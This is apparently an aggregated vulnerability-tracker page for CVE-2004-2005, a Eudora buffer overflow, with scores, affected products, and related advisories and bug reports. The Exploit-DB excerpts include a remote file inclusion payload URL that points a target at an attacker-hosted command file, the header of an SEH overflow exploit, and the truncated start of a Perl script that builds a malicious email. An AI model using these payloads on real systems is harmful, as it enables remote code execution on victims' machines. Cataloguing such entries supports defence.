CVE-2004-2005
published 2004-05-06
CVE-2004-2005: Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to…
Priority P426 · medium · 5.1 · CVSS 2.0
AV:N/AC:H/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 3.49% (87.7th percentile)
Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| msrc | microsoft_forefront_endpoint_protection_2010 | — | — |
| msrc | microsoft_security_essentials | — | — |
| msrc | microsoft_system_center_2012_endpoint_protection | — | — |
| msrc | microsoft_system_center_2012_r2_endpoint_protection | — | — |
| msrc | microsoft_system_center_endpoint_protection | — | — |
| msrc | windows_defender | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
| qualcomm | eudora | — | — |
CVSS provenance
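| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 5.1 | MEDIUM | AV:N/AC:H/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 10.0 | CRITICAL | — |
| vendor_msrc | — | 7.8 | HIGH | — |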
GHSA
GHSA-rhhf-gqg6-mv8h: Buffer overflow in Eudora for Windows 5
ghsa_unreviewed·2022-04-29
CVE-2004-2005 [MEDIUM] GHSA-rhhf-gqg6-mv8h: Buffer overflow in Eudora for Windows 5
Buffer overflow in Eudora for Windows 5.2.1, 6.0.3, and 6.1 allows remote attackers to execute arbitrary code via an e-mail with (1) a link to a long URL to the C drive or (2) a long attachment name.
Red Hat
ncompress: insecure tmp file handling may lead to file overwrite
vendor_redhat·2021-11-09·CVSS 2.1
CVE-2005-2991 [LOW] CWE-59 ncompress: insecure tmp file handling may lead to file overwrite
ncompress 4.2.4 and earlier allows local users to overwrite arbitrary files via a symlink attack on temporary files using (1) zdiff or (2) zcmp, a different vulnerability than CVE-2004-0970.
Statement: Not vulnerable. This issue did not affect the ncompress packages as distributed with Red Hat Enterprise Linux 2.1, 3, or 4.
Package: ncompress (Red Hat Enterprise Linux 6) - Not affected
Package: ncompress (Red Hat Enterprise Linux 7) - Not affected
Package: ncompress (Red Hat Enterprise Linux 8) - Not affected
Red Hat
perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
vendor_redhat·2008-11-19·CVSS 2.6
CVE-2008-5302 [LOW] perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Race condition in the rmtree function in File::Path 1.08 and 2.07 (lib/File/Path.pm) in Perl 5.8.8 and 5.10.0 allows local users to create arbitrary setuid binaries via a symlink attack, a different vulnerability than CVE-2005-0448, CVE-2004-0452, and CVE-2008-2827. NOTE: this is a regression error related to CVE-2005-0448. It is different from CVE-2008-5303 due to affected versions.
Red Hat
security flaw
vendor_redhat·2004-12-15·CVSS 10.0
CVE-2004-1287 [CRITICAL] security flaw
Buffer overflow in the error function in preproc.c for NASM 0.98.38 1.2 allows attackers to execute arbitrary code via a crafted asm file, a different vulnerability than CVE-2005-1194.
Statement: Red Hat Enterprise Linux 5 is not vulnerable to this issue as it contains a backported patch.
Red Hat
security flaw
vendor_redhat·2002-03-15·CVSS 4.3
CVE-2004-0804 [MEDIUM] security flaw
Vulnerability in tif_dirread.c for libtiff allows remote attackers to cause a denial of service (application crash) via a TIFF image that causes a divide-by-zero error when the number of row bytes is zero, a different vulnerability than CVE-2005-2452.
No detection rules found.
Exploit-DB
Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
exploitdb·2006-07-01
CVE-2006-3375 Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion
---
Title : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author : OLiBekaS
-
contact : olibekas[at]gmail.com
-
dork : "software 2004-2005 by randshop"
-
exploit : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-
# milw0rm.com [2006-07-01]
Exploit-DB
Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
exploitdb·2005-12-08
CVE-2005-4131 Microsoft Excel 95/97/2000/2002/2003/2004 - Malformed Range Memory Corruption
---
source: https://www.securityfocus.com/bid/15780/info
Microsoft Excel is susceptible to a remote code-execution vulnerability. This issue was originally disclosed through an eBay auction that has since been terminated.
This issue is due to the application's failure to properly bounds-check user-supplied input data in the 'Named Range' definition in Excel data files. This results in the corruption of critical memory sections, allowing code execution.
The following is a proof-of-concept example segment of an Excel data file. The '*' characters represent the location of the affected value that triggers this issue. Setting these locations to '0xFF' will crash the application.
00000720 00 80 00 ff 93 02 04 00
Exploit-DB
CrystalFTP Pro 2.8 - Remote Buffer Overflow
exploitdb·2005-04-24
CVE-2004-1327 CrystalFTP Pro 2.8 - Remote Buffer Overflow
---
/*
* CrystalFTP Pro v2.8 Buffer Overflow Exploit
*
* 04/25/2005
*
* despite the fact that nobody uses CrystalFTP
* i had to release a new version that replaces
* the first one.
*
* this overwrites the structured exception handler
* with a "pop edx pop eax ret" in kernel32.dll.
* this takes us to a pointer of the next SEH.
* just jmp over the SEH itself and reverse code
* gets executed.
*
* add more targets if needed
*
* have phun
*
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ local
Exploit-DB
Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun
exploitdb·2004-05-07
CVE-2004-2005 Qualcomm Eudora 5.2.1/6.x - Embedded Hyperlink Buffer Overrun
---
source: https://www.securityfocus.com/bid/10298/info
Qualcomm Eudora is reported to be prone to a remotely exploitable buffer overrun vulnerability.
The issue is exposed when an excessively long hyperlink to a file resource is embedded in an HTML e-mail. This may permit remote attackers to execute arbitrary code via malicious e-mail in the context of the client user.
This issue was reported in Eudora on Windows platforms. Eudora for Apple Mac operating systems may be similarly affected, though this has not been confirmed.
#!/usr/bin/perl --
print "From: me\n";
print "To: you\n";
print "Subject: Eudora file URL buffer overflow demo\n";
print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";
print "Th
Bugzilla
CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
bugzilla·2008-11-28·CVSS 2.6
CVE-2008-5302 [LOW] CVE-2008-5302 perl: File::Path rmtree race condition (CVE-2005-0448) reintroduced after upstream rebase to 5.8.8-1
Created attachment 325021
Ours perl-5.8.0-CAN-2005-0448-rmtree.patch applied against perl_5.8.0-90.4
Common Vulnerabilities and Exposures originally assigned an identifier CVE-2005-0448 to the following vulnerability:
Race condition in the rmtree function in File::Path.pm in Perl before 5.8.4 allows local users to create arbitrary setuid binaries in the tree being
deleted, a different vulnerability than CVE-2004-0452.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0448
It was discovered that after upstream perl rebase to 5.8.8-1, this issue
was reintroduced (seems upstream didn't apply fix for CVE-2005-0448).
This issue already fixed again in perl-5.1
Bugzilla
CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
bugzilla·2006-06-02·CVSS 5.0
CVE-2006-0052 [MEDIUM] CVE-2006-0052 Mailman DoS, CVE-2006-1712 Mailman cross site scripting bug and CVE-2005-3573 Mailman Denial of Service (CVE-2005-4153); also CAN-2004-1177 Cross-site scripting (XSS) vulnerability
Mailman DoS allows remote attackers to cause a denial of service by using
multipart MIME message with a single part MIME message.
Mailman cross site scripting bug allows remote attackers to inject arbitrary web
script in the form of action argument.
In Mailman Denial of Service application crash and server message "fail with an
Overflow on bad date data in a processed message".
http://www.redhat.com/archives/fedora-test-list/2006-May/msg00131.html
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00134.htm
http://www.redhat.com/archives/fedora-package-announce/2006-May/msg00135.
Bugzilla
CAN-2004-1304, File ELF Header Unspecified Buffer Overflow
bugzilla·2004-12-07
[MEDIUM] CAN-2004-1304, File ELF Header Unspecified Buffer Overflow
04.48.16 CVE: Not Available
Platform: Unix
Title: File ELF Header Unspecified Buffer Overflow
Description: The Unix file command is affected by a buffer overflow
vulnerability. This issue is due to a failure of the application to
properly validate string lengths in the affected files prior to
copying them into static process buffers. This can be leveraged by an
attacker to execute hostile code on the vulnerable system.
Ref: http://www.securityfocus.com/advisories/7566
------- Additional Comments From [email protected] 2004-12-14 08:40:43 ----
gentoo has an advisory on it, now, too:
http://www.gentoo.org/security/en/glsa/glsa-200412-07.xml
------- Additional Comments From [email protected] 2005-02-15 07:21:09 ----
T
http://lists.netsys.com/pipermail/full-disclosure/2004-May/021059.html
http://marc.info/?l=bugtraq&m=108395487628044&w=2
http://secunia.com/advisories/11568
http://www.eudora.com/download/eudora/windows/6.1.1/RelNotes.txt
http://www.securityfocus.com/bid/10298
https://exchange.xforce.ibmcloud.com/vulnerabilities/16086
Published: 2004-05-06